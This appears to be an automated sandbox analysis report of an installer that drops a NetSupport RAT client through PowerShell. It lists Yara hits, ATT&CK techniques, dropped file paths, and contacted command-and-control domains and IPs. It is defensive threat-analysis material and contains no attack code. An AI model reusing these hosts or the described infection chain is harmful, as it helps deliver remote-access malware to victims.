                                  Source: Yara matchFile source: 7.2.client32.exe.68890000.5.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.2.client32.exe.6db60000.6.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.2.client32.exe.68890000.4.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.68890000.4.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.2.client32.exe.68590000.3.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000007.00000000.1905886353.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000002.2115416028.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.4094673945.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000002.2034197288.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000000.2033095471.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000000.2113912617.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000002.2116677838.0000000000788000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5448, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 4008, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 2004, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7072, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dll, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dll, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SystemUtil\PCICHEK.DLL, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLL, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SystemUtil\TCCTL32.DLL, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL, type: DROPPED

                                  Mitre Att&ck Matrix

                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity InformationAcquire Infrastructure2
                                  Valid Accounts                                  		1
                                  Windows Management Instrumentation                                  		1
                                  DLL Side-Loading                                  		1
                                  DLL Side-Loading                                  		1
                                  Deobfuscate/Decode Files or Information                                  		OS Credential Dumping11
                                  System Time Discovery                                  		Remote Services1
                                  Archive Collected Data                                  		3
                                  Ingress Tool Transfer                                  		Exfiltration Over Other Network Medium1
                                  System Shutdown/Reboot
                                  CredentialsDomainsDefault Accounts3
                                  Native API                                  		2
                                  Valid Accounts                                  		2
                                  Valid Accounts                                  		3
                                  Obfuscated Files or Information                                  		LSASS Memory1
                                  Account Discovery                                  		Remote Desktop Protocol1
                                  Screen Capture                                  		22
                                  Encrypted Channel                                  		Exfiltration Over Bluetooth1
                                  Defacement
                                  Email AddressesDNS ServerDomain Accounts2
                                  Command and Scripting Interpreter                                  		11
                                  Registry Run Keys / Startup Folder                                  		21
                                  Access Token Manipulation                                  		11
                                  Software Packing                                  		Security Account Manager1
                                  System Service Discovery                                  		SMB/Windows Admin Shares3
                                  Clipboard Data                                  		4
                                  Non-Application Layer Protocol                                  		Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts2
                                  PowerShell                                  		Login Hook12
                                  Process Injection                                  		1
                                  DLL Side-Loading                                  		NTDS3
                                  File and Directory Discovery                                  		Distributed Component Object ModelInput Capture5
                                  Application Layer Protocol                                  		Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                                  Registry Run Keys / Startup Folder                                  		2
                                  Masquerading                                  		LSA Secrets33
                                  System Information Discovery                                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                                  Valid Accounts                                  		Cached Domain Credentials151
                                  Security Software Discovery                                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                                  Virtualization/Sandbox Evasion                                  		DCSync2
                                  Process Discovery                                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                                  Access Token Manipulation                                  		Proc Filesystem31
                                  Virtualization/Sandbox Evasion                                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                                  Process Injection                                  		/etc/passwd and /etc/shadow11
                                  Application Window Discovery                                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing3
                                  System Owner/User Discovery                                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                                  Behavior Graph

                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1552424 Sample: KC0uZWwr8p.exe Startdate: 08/11/2024 Architecture: WINDOWS Score: 60 48 payiki.com 2->48 50 anyhowdo.com 2->50 52 geo.netsupportsoftware.com 2->52 62 Suricata IDS alerts for network traffic 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 Sigma detected: Powershell drops NetSupport RAT client 2->66 68 5 other signatures 2->68 9 KC0uZWwr8p.exe 2 2->9         started        12 client32.exe 2->12         started        14 client32.exe 2->14         started        signatures3 process4 file5 46 C:\Users\user\AppData\...\KC0uZWwr8p.tmp, PE32 9->46 dropped 16 KC0uZWwr8p.tmp 25 149 9->16         started        process6 file7 30 C:\Program Files (x86)\...\is-F5QT3.tmp, PE32 16->30 dropped 32 C:\Users\user\...xtractedContent.ps1, ASCII 16->32 dropped 34 C:\Program Files (x86)\...\unins000.dat, InnoSetup 16->34 dropped 36 116 other files (none is malicious) 16->36 dropped 60 Bypasses PowerShell execution policy 16->60 20 powershell.exe 1 55 16->20         started        signatures8 process9 file10 38 C:\Users\user\AppData\...\remcmdstub.exe, PE32 20->38 dropped 40 C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32 20->40 dropped 42 C:\Users\user\AppData\...\client32.exe, PE32 20->42 dropped 44 7 other files (6 malicious) 20->44 dropped 70 Found suspicious powershell code related to unpacking or dynamic code loading 20->70 72 Loading BitLocker PowerShell Module 20->72 74 Powershell drops PE file 20->74 24 client32.exe 16 20->24         started        28 conhost.exe 20->28         started        signatures11 process12 dnsIp13 54 anyhowdo.com 199.188.200.195, 443, 49740 NAMECHEAP-NETUS United States 24->54 56 payiki.com 151.236.16.15, 443, 49739 HVC-ASUS European Union 24->56 58 geo.netsupportsoftware.com 104.26.0.231, 49741, 49742, 49743 CLOUDFLARENETUS United States 24->58 76 Contains functionalty to change the wallpaper 24->76 78 Contains functionality to detect sleep reduction / modifications 24->78 signatures14

                                  Screenshots

                                  Thumbnails

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand

                                  Antivirus, Machine Learning and Genetic Malware Detection

                                  Initial Sample

                                  SourceDetectionScannerLabelLink
                                  KC0uZWwr8p.exe18%ReversingLabs

                                  Dropped Files

                                  SourceDetectionScannerLabelLink
                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)3%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-012CR.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-0LL3Q.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-14FKM.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-2D48T.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-2Q7I9.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-2QS06.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-2QTH6.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-495HA.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-4U5GH.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-56HU1.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-593G3.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-5BNS6.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-5C3J6.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-5JUJC.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-5KHP2.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-5URF2.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-6H7V6.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-92N74.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-9GMK5.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-A7U9L.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-AQQBN.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-BPHN2.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-DLE8L.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-DMJVK.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-DORH9.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-ET1Q4.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-ET38G.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-F5QT3.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-FLT6F.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-FNUE4.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-FOUIF.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-HA61E.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-I1VEE.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-IK3SG.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-IVQT8.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-JOPC8.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-L3ANO.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-L4L9S.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-MB1RQ.tmp0%ReversingLabs

                                  Unpacked PE Files

                                  No Antivirus matches

                                  Domains

                                  No Antivirus matches

                                  URLs

                                  SourceDetectionScannerLabelLink
                                  http://www.uninetutility.com/support0%Avira URL Cloudsafe
                                  http://www.uninetutility.com0%Avira URL Cloudsafe
                                  http://151.236.16.15/fakeurl.htm0%Avira URL Cloudsafe
                                  http://www.uninetutility.com/update)0%Avira URL Cloudsafe
                                  http://www.radmin.com0%Avira URL Cloudsafe
                                  http://www.macrovision.com00%Avira URL Cloudsafe
                                  http://www.uninetutility.comQV0%Avira URL Cloudsafe
                                  http://199.188.200.195/fakeurl.htm0%Avira URL Cloudsafe
                                  http://www.advanced-ip-scanner.com00%Avira URL Cloudsafe
                                  http://www.uninetutility.com/update0%Avira URL Cloudsafe

                                  Domains and IPs

                                  Contacted Domains

                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  payiki.com
                                  		151.236.16.15
                                  		truetrue
                                    		unknown
                                    geo.netsupportsoftware.com
                                    		104.26.0.231
                                    		truefalse
                                      		high
                                      anyhowdo.com
                                      		199.188.200.195
                                      		truetrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://151.236.16.15/fakeurl.htmtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://geo.netsupportsoftware.com/location/loca.aspfalse
                                          		high
                                          http://199.188.200.195/fakeurl.htmtrue
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://www.netsupportsoftware.compowershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUKC0uZWwr8p.exefalse
                                              		high
                                              http://%s/testpage.htmwininet.dllpowershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                		high
                                                http://geo.netsupportsoftware.com/location/loca.asp%fclient32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.uninetutility.comKC0uZWwr8p.exe, 00000000.00000003.1998537758.0000000000E71000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.uninetutility.com/supportKC0uZWwr8p.exe, 00000000.00000003.1998537758.0000000000E4D000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1993202352.0000000002ECD000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)client32.exe, 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                      		high
                                                      http://ocsp.sectigo.com0powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.pci.co.uk/supportsupportclient32.exe, 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                          		high
                                                          http://www.uninetutility.com/updateKC0uZWwr8p.tmp, 00000001.00000003.1993202352.0000000002EDC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.openssl.org/Vis-BPHN2.tmp.1.drfalse
                                                            		high
                                                            http://qt-project.org/xml/features/report-whitespace-only-CharDatais-0LL3Q.tmp.1.drfalse
                                                              		high
                                                              https://contoso.com/Licensepowershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://trolltechis-0LL3Q.tmp.1.drfalse
                                                                  		high
                                                                  http://127.0.0.1RESUMEPRINTINGclient32.exe, 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                    		high
                                                                    http://%s/testpage.htmpowershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                      		high
                                                                      http://xml.org/sax/features/namespace-prefixesis-0LL3Q.tmp.1.drfalse
                                                                        		high
                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.uninetutility.com/update)KC0uZWwr8p.exe, 00000000.00000003.1998537758.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://%s/fakeurl.htmclient32.exe, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                              		high
                                                                              http://www.openssl.org/support/faq.htmlis-BPHN2.tmp.1.drfalse
                                                                                		high
                                                                                http://geo.netsupportsoftware.com/location/loca.aspEgclient32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://crl.thawte.com/ThawteTimestampingCA.crl0KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.uninetutility.comQVKC0uZWwr8p.tmp, 00000001.00000003.1993202352.0000000002EF1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1912534174.00000000045D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.remobjects.com/psKC0uZWwr8p.exe, 00000000.00000003.1647342710.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.exe, 00000000.00000003.1648007586.000000007EB2B000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000000.1649520541.00000000004C1000.00000020.00000001.01000000.00000004.sdmpfalse
                                                                                        		high
                                                                                        https://contoso.com/powershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.innosetup.com/KC0uZWwr8p.exe, 00000000.00000003.1647342710.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.exe, 00000000.00000003.1648007586.000000007EB2B000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000000.1649520541.00000000004C1000.00000020.00000001.01000000.00000004.sdmpfalse
                                                                                              		high
                                                                                              https://sectigo.com/CPS0Dpowershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.macrovision.com0KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://geo.netsupportsoftware.com/location/loca.aspuclient32.exe, 00000007.00000002.4095147957.000000000082A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.netsupportschool.com/tutor-assistant.asp11(client32.exe, 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1912534174.00000000045D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
